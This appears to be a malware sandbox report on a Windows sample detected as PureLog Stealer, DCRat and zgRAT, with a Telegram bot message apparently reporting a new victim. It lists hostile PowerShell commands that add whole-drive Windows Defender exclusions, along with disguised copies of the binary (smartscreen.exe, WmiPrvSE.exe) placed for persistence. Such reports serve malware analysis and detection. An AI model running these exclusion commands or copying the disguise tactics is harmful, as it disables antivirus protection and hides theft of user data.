                                                                                                {"ok":true,"result":{"message_id":161,"from":{"id":7829111840,"is_bot":true,"first_name":"sosososoossososofdksjg_bot","username":"kdafjkdajgkfsjgsfjlkjgs_bot"},"chat":{"id":6951385386,"first_name":".","username":"a_123412","type":"private"},"date":1728671834,"photo":[{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAANzAAM2BA","file_unique_id":"AQAD2-kxGzoJUEh4","file_size":1106,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAANtAAM2BA","file_unique_id":"AQAD2-kxGzoJUEhy","file_size":14154,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAAN4AAM2BA","file_unique_id":"AQAD2-kxGzoJUEh9","file_size":58008,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAAN5AAM2BA","file_unique_id":"AQAD2-kxGzoJUEh-","file_size":85601,"width":1280,"height":1024}],"caption":"new user connect !\nID: cb9f04f525f9e1298 [TRUNCATED]



                                                                                                Target ID:0
                                                                                                Start time:14:36:59
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
                                                                                                Imagebase:0x450000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:5
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:7
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:9
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:11
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:14
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:16
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:17
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:21
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:22
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:23
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:24
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:25
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:36
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xc50000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:false

                                                                                                Target ID:37
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xf90000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:41
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Imagebase:0x150000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:42
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Imagebase:0xa80000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:44
                                                                                                Start time:14:37:08
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Recovery\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                Imagebase:0xfd0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:46
                                                                                                Start time:14:37:08
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Recovery\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                Imagebase:0x5d0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:47
                                                                                                Start time:14:37:15
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                                                                                                Imagebase:0x7ff69b960000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:49
                                                                                                Start time:14:37:15
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:51
                                                                                                Start time:14:37:16
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:chcp 65001
                                                                                                Imagebase:0x7ff762fd0000
                                                                                                File size:14'848 bytes
                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:52
                                                                                                Start time:14:37:18
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                Imagebase:0x7ff7bbfe0000
                                                                                                File size:108'032 bytes
                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:53
                                                                                                Start time:14:37:23
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xbb0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:55
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:56
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:57
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6068e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:58
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:59
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:60
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:61
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:62
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:63
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:64
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
